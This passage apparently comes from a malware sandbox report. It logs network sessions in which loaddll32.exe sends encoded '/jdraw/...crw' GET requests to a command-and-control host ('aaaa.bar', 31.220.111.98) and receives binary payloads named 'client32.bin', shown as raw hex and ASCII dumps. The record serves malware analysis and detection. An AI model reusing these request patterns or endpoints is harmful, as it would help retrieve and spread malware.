                                                              Data Ascii: PJ2;\v fUz>\y\gx0?.k7RZ*6A&s'NZo Q+6AfV:b;Ocx)likQ|%V<q8j@#P{LWFk2~Vf/*~a\DrKrtR2$rs:-9SgF/vPt+K7'
                                                              2021-10-20 13:12:10 UTC979INData Raw: 14 89 b0 b4 78 16 cb 9a d1 b4 2b 9a 06 d1 06 1a 64 a3 10 4c ce 3a 8a 60 7c 73 b2 8b 7e 79 af a2 dc d1 6f 54 60 79 9f f4 96 38 4f 3b 0d 9e 31 ea c1 4b 1a c1 40 09 64 af 88 bc 54 18 ff 22 1f c7 04 06 86 79 fb 40 18 e4 1a 1f 36 a5 9e 94 ba 5f b7 60 6a 56 6a 8d 1c a6 41 53 d8 ca c6 a4 5a aa 51 ab a7 27 00 4d e4 3b e8 81 18 ba ea 8e 7c 6e 65 4d a1 a0 1c 3f bf 81 27 c8 85 c0 08 e9 ee 06 c9 47 cd a4 58 3c 71 b2 83 94 31 1c 7f a7 b3 c7 68 34 ff 5e 29 23 a3 8c a1 21 90 5b 3d 77 c6 bb 48 39 f2 a4 c2 e2 4f 7c 9d 9c 0c c3 9d fe 5c 92 64 89 a1 d0 fa a3 75 d7 55 4c 6a a7 d1 94 d1 8f 1c 3e a2 09 ac 7b 60 d0 83 ad 42 4e ab ec 59 29 0a 2a 1f e9 60 95 6c 49 ea 7a 2e 96 60 81 72 16 79 a5 4d 7e 07 06 45 08 e2 6c 71 c5 eb 61 b2 5a df 0a f4 6f e7 bc 9d 8d ea 30 3e 9a 93 94 da
                                                              Data Ascii: x+dL:`|s~yoT`y8O;1K@dT"y@6_`jVjASZQ'M;|neM?'GX<q1h4^)#![=wH9O|\duULj>{`BNY)*`lIz.`ryM~ElqaZo0>
                                                              2021-10-20 13:12:10 UTC997INData Raw: b3 89 01 8c fe ba 6b 9a 67 71 00 b5 fc 2a 36 f6 da c3 1f 71 26 a8 a4 a7 99 49 ad 9f 98 07 72 49 d2 42 4f 4b 87 6e fc 54 5a d2 8f 20 8e fd 64 5e a3 fa e8 e8 a4 2e 96 44 4b 9f 5c e0 da 8c 65 de 38 cb 99 b5 c2 61 3c 10 58 fc 70 45 b9 22 4e b7 0c b7 aa 95 18 05 da 73 ba 96 45 67 6f 1f 8f 3f a4 c0 f4 27 8f 3c 74 87 ac 75 a4 60 40 a2 47 b6 95 62 ae 8a 02 b6 4f 82 4b ae e2 3e aa 89 2a 8a 73 f3 50 96 97 34 7c 13 4f 6e 83 a3 fc 70 a0 d7 d6 2c ab 65 52 59 08 89 4f 9a 41 3a 75 93 17 32 49 b9 4b ad 60 1e 6f c0 08 dd 14 90 45 75 08 25 ed 73 d2 81 6d 12 83 b7 69 3f 61 14 79 65 db e6 0f 88 64 ea f0 54 e9 eb 31 05 70 d4 a0 5f a9 81 74 60 32 79 cd 93 54 32 09 45 9e 7b e7 12 05 3f b1 da b3 7a 35 5c 61 d6 43 6b ee 2f 39 9c 36 e7 db 22 cb aa f7 db 71 81 aa 8f 36 32 9d ea 04
                                                              Data Ascii: kgq*6q&IrIBOKnTZ d^.DK\e8a<XpE"NsEgo?'<tu`@GbOK>*sP4|Onp,eRYOA:u2IK`oEu%smi?ayedT1p_t`2yT2E{?z5\aCk/96"q62
                                                              2021-10-20 13:12:10 UTC1013INData Raw: fa f6 33 1b b6 39 49 89 e2 64 a4 95 a1 ac b1 b1 0a 42 b2 10 f8 d8 01 53 9c f7 3c ad 2d 4c 84 3b 72 ce 23 df 17 cf 5e 3e cc b4 61 04 c5 52 ab a7 b2 2b 23 54 1d 1a 01 d4 36 2d 3d ae b0 1e 7b 7a ff 48 9c 28 cc da a6 c0 95 ae 62 af d0 74 b3 cb c6 21 de c0 d7 df bd 9a 7a 14 43 58 00 36 9a 60 23 b8 7c af 09 42 b2 a5 fa d6 c1 6d 92 75 e0 22 a8 96 df b7 e3 7d 27 07 b8 30 01 e4 79 d4 29 b4 86 db 90 69 34 61 8d e2 8c af 36 2d 33 64 ee a8 62 a9 96 05 7b 22 d8 8a 22 1e af 8b d8 6e 6f 6a c3 e8 88 e5 d1 12 3c 6b 99 75 9d 62 8a 2b 40 95 20 fa b1 07 ae 20 d2 79 58 97 3a 01 cb 67 c5 61 e8 a0 3a b7 91 7a e4 de 6f 0e 67 7f 0b ba b4 43 63 12 a3 91 7e b2 0c 86 68 83 9a ec 19 98 b1 9f e8 39 50 b5 06 3e 1d 85 a3 c9 f5 ed fe b2 27 dd bd 52 a6 0e b9 ca e3 0c 42 0c e5 3d 29 83 63
                                                              Data Ascii: 39IdBS<-L;r#^>aR+#T6-={zH(bt!zCX6`#|Bmu"}'0y)i4a6-3db{""noj<kub+@ yX:ga:zogCc~h9P>'RB=)c
                                                              2021-10-20 13:12:10 UTC1029INData Raw: 6d cb 2f 68 18 60 2d 77 7b 30 3e f7 16 cb 06 0d ed 04 7c 58 12 ba 32 5b 9c 9a 7f d7 f9 f0 4e 8c 00 db dd 67 2a 90 2f 32 dc 27 d5 61 ce ab bf d6 11 fb ef a4 b2 59 d5 28 f8 cc 9e 5b 36 91 89 3a c4 10 e4 8b 1a 17 a1 ed 0b 5c 99 35 16 ad ed 6f 90 d8 d7 f3 60 b0 68 74 65 75 fd 9e b5 f7 8d 71 5a c7 ed 4f 3e 44 aa de 1f a0 35 1b 8b 00 6b 03 a7 d8 ac 64 af 04 98 af 4a aa 76 d0 90 99 69 1b 71 f1 60 33 4d c3 20 1a b6 a7 46 bb bd 33 07 92 09 47 ae a6 bb 51 19 18 c4 dd e6 5c 04 cf f3 b4 72 34 23 5f 4c 52 b6 30 bd d2 e6 d6 f2 ba de 47 d3 cb 25 0d b2 0a 7e 6b f1 1c e6 81 33 c1 ef ae 35 8b 35 f4 a1 56 97 2f c6 5c 72 0b 1e 9d ef b1 8c 20 0a fe 42 f2 64 5c 0a 96 17 f8 e6 06 40 c1 fe 3d f2 fe e8 40 42 e0 a3 ee a5 99 9e 5e ea e1 53 5a 05 0a 63 50 73 58 e5 6f 13 d1 72 88 a1
                                                              Data Ascii: m/h`-w{0>|X2[Ng*/2'aY([6:\5o`hteuqZO>D5kdJviq`3M F3GQ\r4#_LR0G%~k355V/\r Bd\@=@B^SZcPsXor
                                                              2021-10-20 13:12:10 UTC1045INData Raw: 53 62 ae a3 d9 7e 7d c3 98 68 9b fd 89 49 70 57 0e eb 52 29 d6 62 e9 f2 1d 7c d2 46 2f a4 96 33 f6 b6 b3 94 d7 30 63 04 db fb 60 4d 2c 82 18 01 17 89 2f 44 0e 4f 7f 5f b2 79 c7 f3 f9 88 ad 5e 15 d3 3f c9 fd 72 fd 77 87 17 60 75 f8 85 83 6b bc 96 51 7a 33 23 e7 bf aa f3 5c 3e cd f2 10 54 d0 c5 f8 aa 0d c9 05 d8 c3 6c ef 6a 00 de 77 81 77 d9 fa d9 93 71 85 14 dc f0 13 ff 87 f6 7f 1d 3c 3d 29 77 97 16 13 13 fa e5 8b e9 c9 c1 ad 5c 0d a5 b7 be 11 a6 85 a8 5b 1b d8 ae e7 85 ff e8 46 47 ed a1 40 b2 bc 1a 82 fc d0 9c a8 32 b7 dd 06 cf 50 34 72 6b 24 ad d7 ec e0 ac 79 27 1e 9d 26 e2 1e c2 42 2a e8 eb 49 33 b2 8f ad b7 7c 81 79 73 6f f8 af d3 6b 80 7c e1 13 21 f7 60 0b e0 ff 59 a0 f8 81 3e 7f 44 55 87 59 5e 53 c0 3a 96 a9 09 3d 45 f0 e4 5b b7 1d c6 5d 47 01 ed a4
                                                              Data Ascii: Sb~}hIpWR)b|F/30c`M,/DO_y^?rw`ukQz3#\>Tljwwq<=)w\[FG@2P4rk$y'&B*I3|ysok|!`Y>DUY^S:=E[]G
                                                              2021-10-20 13:12:10 UTC1061INData Raw: 5b a1 00 c6 64 27 d0 af 5b e1 4c ed c1 71 6f 5b f5 7b 94 53 8c e5 92 1e b4 2f 7d 8d c5 5a e6 ac 0b 6e f5 0d 40 99 f2 a5 d4 40 d4 71 e9 23 2c 40 bb 6f eb 96 73 0e f9 51 c8 63 9d 33 49 0c 31 7e 88 5c 3e 3c 15 f7 97 48 32 f8 2b e6 fb 88 1a e0 38 e7 13 58 63 9d e7 80 c5 f0 3e ba 91 42 0d 7f cd e9 0d ca e3 e1 81 57 f5 94 7b 71 2f 6d 7c b4 2a f7 6e 85 74 50 94 a5 43 c7 77 00 5e b4 6a c4 a9 37 d4 dc 5f b2 55 b9 d9 f4 e1 81 94 56 02 73 a8 36 b4 9e 4c 53 32 2c 31 20 01 8d c0 58 2a fc df b0 40 cf c3 6e e0 e3 b2 9d 67 10 e6 39 cc 37 2e 73 f7 4d 50 e2 6d 58 bd 3a 55 df 58 64 a3 a7 0b 6a d4 6e a1 4d 01 38 6c 37 62 fe 10 18 92 15 6c d7 7a 2b 46 28 01 c7 58 63 82 80 26 be a3 71 09 9d a3 02 22 2a 19 a5 30 a2 08 40 9a 1c 4f 78 9e 17 cd 38 fe dd 3c 7f 14 42 23 ca 13 19 6e
                                                              Data Ascii: [d'[Lqo[{S/}Zn@@q#,@osQc3I1~\><H2+8Xc>BW{q/m|*ntPCw^j7_UVs6LS2,1 X*@ng97.sMPmX:UXdjnM8l7blz+F(Xc&q"*0@Ox8<B#n
                                                              2021-10-20 13:12:10 UTC1077INData Raw: e2 dd d8 1c c8 ef 82 c0 af 65 b2 ce cf 9b cd 9b 52 a1 f8 80 fe e4 7d a5 36 12 88 cc 61 8a 33 bd 39 e6 58 9f 50 01 1c 4d 01 b4 eb 19 a5 a3 ec 06 45 14 c2 d5 47 4e f9 a8 14 fc a6 64 43 36 fb 29 34 85 de d6 b9 f8 bc 81 aa ee fb 1e e6 d0 7e 0c 8e 4e b9 31 0c 12 af e9 e6 fd 22 d2 c6 50 16 a6 02 1d 7a f6 2b d3 46 07 4f e6 73 ed 53 38 c2 58 45 28 58 3a b1 f6 c3 18 df 96 8a 6f 7e ff 15 c1 12 a6 b6 ac 7f c1 0f ac 94 31 88 b8 1f 5f 74 d9 63 e1 94 11 49 c3 dd 20 d2 c4 78 26 12 f1 60 73 6d 29 bf 09 38 72 79 07 13 3c 13 08 1e 76 10 10 55 a4 fc d1 65 f1 a9 7a 28 bd a7 c6 2e ce 43 31 2e 3d 3b b4 7f b0 2e b5 1b 6c f5 84 98 81 e2 31 55 d2 a7 40 7e 40 c4 a8 e0 2e f9 ef 8c 00 21 f5 26 dd 7c 76 30 ba 5a 76 4f d3 3c 6a e2 da 0f 7c 14 76 42 02 d0 a6 c3 58 3a 01 7c e3 74 fa bc
                                                              Data Ascii: eR}6a39XPMEGNdC6)4~N1"Pz+FOsS8XE(X:o~1_tcI x&`sm)8ry<vUez(.C1.=;.l1U@~@.!&|v0ZvO<j|vBX:|t


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.5 | 49965 | 31.220.111.98 | 443 | C:\Windows\System32\loaddll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-20 13:12:09 UTC | 962 | OUT | GET /jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: aaaa.bar
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
2021-10-20 13:12:10 UTC | 995 | IN | HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 20 Oct 2021 13:12:09 GMT
Content-Type: application/zip
Content-Length: 1849
Connection: close
X-Powered-By: PHP/5.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:10 UTC995INData Raw: 22 1f 12 32 d8 c6 ba 35 1b ff 2a a8 1c 15 83 72 b3 16 30 ce 8b f2 94 08 32 b5 de 35 dc 20 3e ac 5d 96 4d c1 42 3b eb 46 b9 92 bf 30 9f d0 97 f7 68 13 8c 4f ec d3 8c 98 37 3b 38 0c 51 23 b9 f0 b7 b7 68 ff 4b ce a9 e2 e3 0a fb e3 28 6e 38 b4 86 ed 03 1a b9 b3 8d e3 35 69 c2 0f bd f8 60 4a 2a ba b5 be 77 d8 2c 7e 54 ea b0 d2 c4 21 2c 2f 64 67 78 04 20 fb f5 b4 13 84 8f 93 92 a9 da b7 b0 d8 c4 f3 26 b2 9b 6b d4 41 a2 c0 2c 65 66 7d 01 c0 92 8f 3e be 38 e1 5d 3b d7 0f a8 6f 1f 17 e3 68 76 c4 94 df 75 68 dc cf b3 96 d9 68 a9 37 d4 9e 63 ee b1 03 af 8a 98 78 93 81 67 51 05 29 ae f7 06 1d 8d 12 90 f1 82 ea b8 3a bb 3b 1a 73 ab 17 ff bb 0a ba a1 e4 5b 0f 0d b8 1e 90 30 67 3c 7b 7f 44 09 be 0b ee fd 94 d7 8d fb 6a e7 6f b3 40 4c 70 ab fe 15 b8 b5 c7 e8 0d 01 1a 59
                                                              Data Ascii: "25*r025 >]MB;F0hO7;8Q#hK(n85i`J*w,~T!,/dgx &kA,ef}>8];ohvuhh7cxgQ):;s[0g<{Djo@LpY


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.5 | 49967 | 31.220.111.98 | 443 | C:\Windows\System32\loaddll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-20 13:12:10 UTC | 1092 | OUT | GET /jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: aaaa.bar
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
2021-10-20 13:12:11 UTC | 1092 | IN | HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Wed, 20 Oct 2021 13:12:10 GMT
Content-Type: application/zip
Content-Length: 227913
Connection: close
X-Powered-By: PHP/5.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:11 UTC1092INData Raw: 7a d8 e7 e8 5a b1 41 33 b2 bc 98 a1 2d 68 13 0f 97 e9 11 38 74 e6 87 20 80 55 24 d2 32 ca b0 b5 fb ef 70 18 d4 d5 42 17 72 8e d5 2f 06 81 8a 8a 11 9a ce 93 c7 7d 46 ec 89 6f b9 08 6e f3 e9 5b bb 4a 79 2d ee 4e f7 bd 61 1f 44 cd 0a f7 36 20 5a 91 04 8e c1 33 8f f7 b1 d2 4e a6 0c 00 cd 68 f5 3a 14 99 e6 2b 34 95 d5 f2 e2 94 d4 0c 25 ae 18 03 78 09 8e f0 c5 6d 1b ab 49 c1 ad 79 81 48 e4 18 22 57 b8 52 0d 2c 28 17 6f a0 8b 55 5f 4b b3 ff 20 9e 5b f8 e2 dd 1a 3f da c4 ce aa 67 12 2e 97 13 2a f0 f8 b1 ff f1 e6 74 f3 a8 1c c9 9e ed 04 cf 21 b7 dc 2c 23 07 33 02 1b f7 d2 cc 06 e3 d7 20 04 e5 45 b7 db 43 76 2e c6 52 d0 4e d3 fe f7 73 59 44 33 b9 94 7e 52 1a 0f 88 95 66 09 0b 79 84 05 4d 1f b8 a4 eb 7b 33 8a 20 c9 4a 1a 36 2a 02 4b 45 ec 8c 07 04 f7 14 d0 74 ce ec
                                                              Data Ascii: zZA3-h8t U$2pBr/}Fon[Jy-NaD6 Z3Nh:+4%xmIyH"WR,(oU_K [?g.*t!,#3 ECv.RNsYD3~RfyM{3 J6*KEt
                                                              2021-10-20 13:12:11 UTC1108INData Raw: 2e 4a 31 ca f3 2b be 89 95 34 73 d7 cb 0c 35 50 c4 f1 24 68 8b 88 fc e3 a7 a4 41 86 f8 78 72 ba 2c 90 c1 e3 b3 fd cc d2 05 5c b3 e9 df 42 3a 66 1d 3d 9c 30 db dc 67 7b ab 0a 63 9e 99 3a e3 34 02 9b e3 c3 2a 8e 7b 0a 0e d6 b3 13 54 08 d7 62 5c c8 8a f5 3f 45 1a 48 f9 ef 9c 14 54 a6 b4 3d 2e 56 59 e6 16 5b 29 3c 7b 64 d9 3f 07 fa 80 0a 6a b7 ba 82 65 f6 e2 03 5c 3f 54 5c a2 73 0f 30 1a 81 cf 8b e6 ab e2 01 73 0f 1e 18 75 ad 97 26 cb 15 de 15 d6 48 cb 51 79 8f 3f 63 7b 8f f1 92 43 f0 4f 57 de 6c 4e ad b8 1f f6 47 b9 a2 d8 bc 92 4a 95 19 03 62 3c 8d 67 62 d1 80 db d2 f7 06 37 5c 0f 39 52 04 32 b5 99 20 0e ee 13 87 8f c5 e1 15 23 87 6f d4 a4 3f ae fc ef 14 81 fd fb 27 56 6a a0 df 16 76 77 a2 ca c9 af bc ab 64 2a 89 5d 62 98 bf bb 00 02 3f e2 68 b0 35 6a ef 7e
                                                              Data Ascii: .J1+4s5P$hAxr,\B:f=0g{c:4*{Tb\?EHT=.VY[)<{d?je\?T\s0su&HQy?c{COWlNGJb<gb7\9R2 #o?'Vjvwd*]b?h5j~
                                                              2021-10-20 13:12:11 UTC1124INData Raw: 1b c5 c1 52 5d e8 1b 9f 71 ab 0e 0b 8a 06 41 d0 4e b2 cb 38 c5 78 ca 47 e5 5b 37 6b 00 6a a2 3b 43 82 0b 40 3b 9b d6 a7 5c ba 97 be 1f e7 ee af 71 bb 24 48 79 84 77 57 bc ab 4e bb f7 97 e6 e1 0d 53 9e f0 14 bf 31 5d 58 05 68 f2 a0 17 71 1c ad 45 3f ae c8 bc a5 aa 93 eb ba c8 a7 67 ac 5c eb d9 b1 07 eb 5f 17 c0 18 44 0c f2 3d e5 81 b3 8a 93 07 8c a4 fa 37 bc 6f 4c a1 a0 6e 28 50 74 08 0f 4a 51 66 bb b7 f9 2f 6e 3c 71 74 ff d7 8c 9e b5 56 56 9c a7 22 d5 d7 29 76 b5 2e e9 c9 bb bc 74 89 5e 8b 63 a9 b2 5f 63 13 02 9c 34 83 60 13 85 42 2e a4 07 d3 64 e0 bf ec b0 74 b5 5d 30 8f 37 aa b8 eb b6 97 ef d8 c1 41 32 84 02 bf c5 59 16 51 c4 c9 d5 e2 66 32 ef 4b ab 59 9e 90 a0 d8 db c6 fb 78 77 d3 df b2 65 22 a3 66 bb 19 18 43 48 26 2f b4 dc 7b 68 0d 6e 34 d8 2b d0 43
                                                              Data Ascii: R]qAN8xG[7kj;C@;\q$HywWNS1]XhqE?g\_D=7oLn(PtJQf/n<qtVV")v.t^c_c4`B.dt]07A2YQf2KYxwe"fCH&/{hn4+C
                                                              2021-10-20 13:12:11 UTC1140INData Raw: 5f 7a 9f 35 09 63 55 53 bb 4b 41 13 f0 91 f8 0a 07 60 7b f7 55 83 b4 a5 17 86 71 27 6b 8d 18 72 f9 43 15 c2 61 8b 60 90 27 e9 c9 13 a2 a0 63 2f 4d 2a 03 5a 41 7f 9f ab 65 f3 69 ce 1b 35 41 db 34 ea eb d6 9d 9f 13 e8 da 77 03 6a d8 e8 da 4f 0b 2b 13 51 a4 96 a7 47 32 59 77 45 0e b9 1f 3f 73 be 78 a0 8b a6 2d 08 2a 52 36 5b 9d ee c1 d3 49 99 23 d5 5b a7 75 83 e2 18 23 e6 f1 ea 0d 54 aa 2d c6 ee 57 34 e5 fb 67 f2 4b 03 93 72 06 90 b3 b6 3e 4b 0d a4 7f 44 69 e4 dc 3f 91 e0 72 6e 51 e4 59 b9 2d 88 6f 71 75 62 c4 aa f8 c6 f9 3f f1 7f cc f0 29 ea 89 7c 41 40 97 26 1c d1 5a 80 46 a4 7e fd 7b 04 0b 75 65 21 25 9a 05 08 e6 80 cc 1a 48 15 cc c7 14 c2 d7 ab bb 00 83 16 00 d3 4e 21 b2 50 29 94 10 54 24 aa c8 23 81 b3 16 c0 fd de fd 17 01 de 7a 04 d1 0f d1 52 69 97 78
                                                              Data Ascii: _z5cUSKA`{Uq'krCa`'c/M*ZAei5A4wjO+QG2YwE?sx-*R6[I#[u#T-W4gKr>KDi?rnQY-oqub?)|A@&ZF~{ue!%HN!P)T$#zRix
                                                              2021-10-20 13:12:12 UTC1156INData Raw: f6 dc b3 15 4c d1 14 b8 eb 59 b9 e1 37 08 b7 e2 48 73 d3 5f 58 44 83 57 60 8a b5 ba 46 dd e5 13 b4 4b 9f fa b9 3b 16 57 c6 74 ba b7 ca ae da 55 18 25 a9 61 16 1d 54 de c6 0e 93 ad 72 af 8f 01 7f 9e e5 c2 30 ce 18 65 e9 8d 33 23 21 dd 90 99 be 5a 86 38 60 0a 64 5e c0 3c 9b 98 4a c1 8a ae e6 0b 47 ee 0b ba db c2 e3 cc 1e f2 82 cf 91 7a 59 09 fb 82 ef d3 2c 94 20 0d b3 b6 8e fe fd 12 23 d6 25 d3 1e 4c 5e f8 72 51 3b 5a 5c 95 64 a0 88 22 56 ba 5f d3 14 e8 00 66 ea fb 4f 45 b5 4e 9b 57 cf 89 c4 4e a6 c4 0f dd 04 48 55 f2 4d 05 24 24 c3 51 8a b9 48 c7 c6 d8 f6 c9 af f1 de eb 65 ff 4b 63 c3 ea a4 5d 7b 34 40 46 9d 9a 1f be f2 e5 78 ae 49 25 7f 4a 1c 95 15 02 ba 5f ad 1f 2e 56 d5 e7 19 6f de 86 4e d2 7b 7a de 6d f8 e7 dc 57 f5 23 81 91 3e ab 9d df bf 74 84 26 4b
                                                              Data Ascii: LY7Hs_XDW`FK;WtU%aTr0e3#!Z8`d^<JGzY, #%L^rQ;Z\d"V_fOENWNHUM$$QHeKc]{4@FxI%J_.VoN{zmW#>t&K
                                                              2021-10-20 13:12:12 UTC1172INData Raw: 20 bc 07 a2 70 0c ba 65 28 80 61 ab 01 b1 81 37 31 09 a2 a1 66 5c 85 4e 97 ed 5b 95 a8 9f 75 75 3d 68 61 73 f3 9a 62 84 80 1b 83 41 4d a0 6a 3c 97 8b d3 01 45 8e 7d cf 25 76 f8 60 d6 85 04 29 da f2 2a 6a f3 5c 61 19 53 6a e0 54 b4 c8 d0 3d ec b1 f6 a8 41 70 ee a4 81 45 ae cb e4 f8 8e 6b 38 06 eb 05 dd ba 7a af f5 35 93 6b 7d c7 2c 71 20 21 07 81 ac 0b 8d 58 e3 6b 10 c6 50 0f 13 ad a6 a1 48 72 94 7d dd ce 69 16 50 6f 88 bb 55 6f 6c 31 8b ed e7 4b ea a0 cf 38 71 e4 0c f9 89 79 21 01 d8 34 b9 1e 5e 00 38 24 6b ea be e2 59 48 44 b1 52 cd b1 4b f0 70 a9 f8 5e 59 be b8 eb c3 7f 82 9c 9a ff 12 47 93 09 c4 42 ba 07 90 86 13 79 cd e1 4f f3 2c cf e3 13 d4 63 f4 a7 c6 57 a3 a5 9b 80 40 43 ce 8d 9b eb 6e bd f6 db 92 35 b5 45 df 08 5a f2 df 84 f0 c2 9c 93 80 35 01 c8
                                                              Data Ascii: pe(a71f\N[uu=hasbAMj<E}%v`)*j\aSjT=ApEk8z5k},q !XkPHr}iPoUol1K8qy!4^8$kYHDRKp^YGByO,cW@Cn5EZ5
                                                              2021-10-20 13:12:12 UTC1188INData Raw: 3b 57 ae 94 64 e1 a2 2f 21 c8 68 fe 83 e9 c0 cc a5 b4 7d ed a7 76 49 ee 30 ac 0d 6b 83 8d 7e 8c ee f8 05 a7 b8 0d 28 e8 9f 3a fb 0b 38 bd fc e6 f8 a1 f9 86 52 ed 92 14 e5 a5 bb 73 24 43 0c 32 6b e9 a3 3e 89 f9 40 7e 69 90 4b b7 6a bf 9b fa 8c e4 ad 3a 20 45 36 5a 03 e0 ff 57 aa de 5d 27 4d 6d f8 a4 95 ae 49 02 c3 28 03 59 cd e3 fc e9 10 ac 2e 39 9c 64 22 3e 5a c2 81 57 11 29 68 0c 61 51 2f dd c5 b5 77 8f 31 ac 3c 48 aa 79 78 74 63 5c da a6 49 bc d2 39 01 f1 0f bb c2 f6 2a 5f 28 b1 0d 45 ca e9 dd 2c 23 c9 61 c2 45 e8 64 1d 29 cb b1 f7 70 c4 6d 0b 74 3d 1a 6f 20 e9 67 f2 6c 6a 67 15 27 d6 86 19 bf d1 31 31 15 ca c2 e1 0d 22 f6 cd 34 a4 87 47 81 23 7c 06 aa db 60 22 7b 5d 59 df 70 e6 8f 80 70 c9 d4 2e 2f 22 98 bb ad 88 cb b3 3b b0 11 09 ab 1a f3 75 16 9d 3b
                                                              Data Ascii: ;Wd/!h}vI0k~(:8Rs$C2k>@~iKj: E6ZW]'MmI(Y.9d">ZW)haQ/w1<Hyxtc\I9*_(E,#aEd)pmt=o gljg'11"4G#|`"{]Ypp./";u;
                                                              2021-10-20 13:12:12 UTC1204INData Raw: f4 45 5b 10 5c 2d 4f 1a 90 46 e3 a0 a3 5d 2e e4 27 e6 81 b2 37 f3 fe f5 c0 cb e2 5a 0c 85 c8 56 8d 72 ef 1d 40 1f bd 5e 9f e2 2c 58 0d ce 81 8d 68 22 f1 3e be b1 ce 56 8e 96 ed 7f cb 93 2f c6 da 16 3f 14 29 1e 69 9f ec 31 e0 23 9a 44 94 ef 4b d8 d0 c1 08 99 69 29 c8 2a 18 90 5d 29 c6 d0 cf 66 66 b7 01 05 60 0b 83 1a 6d f9 a0 1d a2 2d 4d a8 5e fc 38 c5 9e 05 82 09 de 00 4f b7 73 ea fb 72 8c cf 67 11 83 58 16 68 e5 c9 91 0f c6 ab 3c ca b1 6f a4 bf 65 e6 a9 54 f6 5c e5 52 58 a3 47 c0 29 a5 02 3c 26 7e 71 87 43 db e8 e3 12 c2 56 f4 e8 c1 a2 78 c5 10 65 40 9f cb f9 f8 c9 72 03 b4 6e 95 83 be c1 6e 77 9d 2a 24 bb 73 49 27 db 0a 07 10 9c 66 19 ba ea 00 22 f3 19 53 e4 a1 e4 9f 83 db a8 a6 ea 07 ec 20 6f 87 4f c8 0a 75 cc cc e6 2d fd 2d de 8a 1a 29 f7 1e 23 9e 84
                                                              Data Ascii: E[\-OF].'7ZVr@^,Xh">V/?)i1#DKi)*])ff`m-M^8OsrgXh<oeT\RXG)<&~qCVxe@rnnw*$sI'f"S oOu--)#
                                                              2021-10-20 13:12:12 UTC1220INData Raw: b0 34 69 ae f2 ed 91 62 cf 4c f2 04 e4 81 46 be 40 88 33 ea 12 7f 56 54 38 6e db 40 6d 51 a2 77 ae 02 c6 38 fe 95 2b 17 d7 46 6d 99 c8 3d a7 24 23 10 19 04 2e 3f b8 3d 3c 61 b3 75 82 a1 db 73 32 a3 ba 8c 74 19 28 b4 61 32 ce 18 c2 a7 b8 29 64 f0 59 ea 32 6e 80 1c e4 08 95 08 11 60 54 47 4f 6e a4 5c 7e 63 6d 92 07 c8 8d 02 05 b3 5f 8e 4d dd 31 80 60 af 08 f7 83 2a 1c 25 60 d0 f5 0d dc 79 5d 9d f6 32 fa 40 07 f0 0d a6 f3 a4 7c 6e 95 c0 37 0f b2 f6 fd 4c a0 42 ea 19 f4 58 ae dd 23 9b f7 bb d5 6f 0c 63 d1 92 98 60 b3 c4 66 10 04 d9 51 49 7c 5e 2a 52 89 d4 a2 1a ee db f4 56 d6 53 c7 b3 05 c1 44 71 f4 45 8a b0 67 98 7d 76 d2 c0 e9 48 78 c3 e4 75 71 8b 47 b9 c0 41 8a 1c 15 d7 33 95 c1 46 41 8d 8f bd b8 6b 7c 5d 0b 00 3c fb f4 92 c9 be 97 92 fc 29 98 dc 54 40 51
                                                              Data Ascii: 4ibLF@3VT8n@mQw8+Fm=$#.?=<aus2t(a2)dY2n`TGOn\~cm_M1`*%`y]2@|n7LBX#oc`fQI|^*RVSDqEg}vHxuqGA3FAk|]<)T@Q
                                                              2021-10-20 13:12:12 UTC1236INData Raw: a6 7e c3 d7 27 38 80 6d 49 5d ad 80 7b 43 c3 fc 9a 87 9f 53 3a b7 14 15 97 8a 69 87 72 bc 3c a7 88 1e 34 ff 0e d6 ba 8e 0f 5d 42 b0 9a d6 48 bf 3d 19 e5 d6 3e 7b 3b 5f 5e b8 5d 9f a4 ac b0 8e a3 bb e9 89 1e 98 f2 24 ce 4f d6 42 b4 09 c7 14 65 d4 28 df 25 8d fd 27 a5 fc 9a 08 3c 41 73 ca 7e 2c b9 b3 10 20 d0 50 ad 19 1f 23 a0 13 9c 55 b8 30 b4 ed e3 06 18 78 7c 56 12 8e 4d dd 81 ab 9f 21 dc b1 8a 1e aa 8d 1b d5 4b e4 66 9c c8 fc 23 e2 16 65 0f 60 75 d1 21 8f 15 4e 4c 9f ef 63 22 84 4b 27 19 d0 65 1c ff c0 40 8f 76 82 c9 84 e6 0c 61 f7 d3 32 8a 48 e6 f8 d6 8c 63 4a 68 b4 7b 5e bd f8 69 f6 a9 61 13 bf 1a 14 4d 37 04 c2 f8 f3 78 71 1f 87 78 1c ed ae 8f 85 45 7e a4 e4 9f 1d be 25 ea 73 b0 1c 81 9b ee 91 31 b2 97 03 2f 7c b8 3e 